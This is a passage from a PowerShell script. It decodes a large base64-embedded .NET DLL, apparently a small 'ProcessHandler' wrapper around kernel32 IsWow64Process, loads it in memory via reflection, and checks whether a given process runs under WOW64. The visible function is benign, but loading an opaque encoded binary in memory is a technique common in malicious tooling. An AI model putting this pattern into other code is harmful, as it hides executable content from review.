wAAAAAAAEgAAAACAAUAUCAAAEwFAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEJTSkIBAAEAAAAAAAwAAAB2Mi4wLjUwNzI3AAAAAAUAbAAAAMQBAAAjfgAAMAIAAEACAAAjU3RyaW5ncwAAAABwBAAABAAAACNVUwB0BAAAEAAAACNHVUlEAAAAhAQAAMgAAAAjQmxvYgAAAAAAAAACAAABRzUAFAkAAAAA+gEzABYAAAEAAAAPAAAAAgAAAAEAAAADAAAADQAAAA0AAAACAAAAAQAAAAEAAAABAAAAAQAAAAAAegEBAAAAAAAGAOIA7QEGAE8B7QEGAC8AuwEPAA0CAAAGAFcAlAEGAMUAlAEGAKYAlAEGADYBlAEGAAIBlAEGABsBlAEGAG4AlAEGAEMAzgEGACEAzgEGAIkAlAEGADgCjQEAAAAAAQAAAAAAAQABAIEBEACmAQAAPQABAAEAAAAAAIAAliAcAiUAAQAAIAAAAAABAAEAEwACIAIAKwIJALUBAQARALUBBgAZALUBCgApALUBEAAxALUBEAA5ALUBEABBALUBEABJALUBEABRALUBEABZALUBEABhALUBFQBpALUBEABxALUBEAAuAAsALAAuABMANQAuABsAVAAuACMAXQAuACsAcQAuADMAcQAuADsAcQAuAEMAXQAuAEsAdwAuAFMAcQAuAFsAcQAuAGMAjwAuAGsAuQADACMABwAjAG0BQAEDABwCAQAEgAAAAQAAAAAAAAAAAAAAAACmAQAAAgAAAAAAAAAAAAAAGgAKAAAAAAAAAAAAADxNb2R1bGU+AG1zY29ybGliAHByb2Nlc3NIYW5kbGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBBc3NlbWJseUZpbGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJseURlc2NyaXB0aW9uQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlvbnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQBrZXJuZWwzMi5kbGwAUHJvY2Vzc0hhbmRsZXIuZGxsAFN5c3RlbQBTeXN0ZW0uUmVmbGVjdGlvbgBQcm9jZXNzSGFuZGxlcgAuY3RvcgBTeXN0ZW0uRGlhZ25vc3RpY3MAU3lzdGVtLlJ1bnRpbWUuSW50ZXJvcFNlcnZpY2VzAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMARGVidWdnaW5nTW9kZXMASXNXb3c2NFByb2Nlc3MAd293NjRQcm9jZXNzAE9iamVjdAAAAAAAAMe7zDzTzepJlqlyZm7cVhgABCABAQgDIAABBSABARERBCABAQ4EIAEBAgi3elxWGTTgiQECBgACAhgQAggBAAgAAAAAAB4BAAEAVAIWV3JhcE5vbkV4Y2VwdGlvblRocm93cwEIAQACAAAAAAATAQAOUHJvY2Vzc0hhbmRsZXIAAAUBAAAAABcBABJDb3B5cmlnaHQgwqkgIDIwMTgAACkBACQ1ZjgyNWQwMC00N2QwLTQ2YWItYTc5Ny1lNGE5Yjk1N2U1N2YAAAwBAAcxLjAuMC4wAAAAAAAAAAArf2BaAAAAAAIAAAAcAQAAuCUAALgHAABSU0RTRWkwPXJV1k+vS2U2WvlSPAEAAABDOlxVc2Vyc1xhZG1pblxzb3VyY2VccmVwb3NcUHJvY2Vzc0hhbmRsZXJcUHJvY2Vzc0hhbmRsZXJcb2JqXFJlbGVhc2VcUHJvY2Vzc0hhbmRsZXIucGRiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPwmAAAAAAAAAAAAABYnAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIJwAAAAAAAAAAAAAAA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"
    $dllbytes  = [System.Convert]::FromBase64String($ps)
    $assembly = [System.Reflection.Assembly]::Load($dllbytes)
}

$processHandle = (Get-Process -id $processID).Handle
$is64 = [IntPtr]::Zero
try{
[ProcessHandler]::IsWow64Process($processHandle, [ref]$is64) |Out-Null
} catch {

}
$is64

}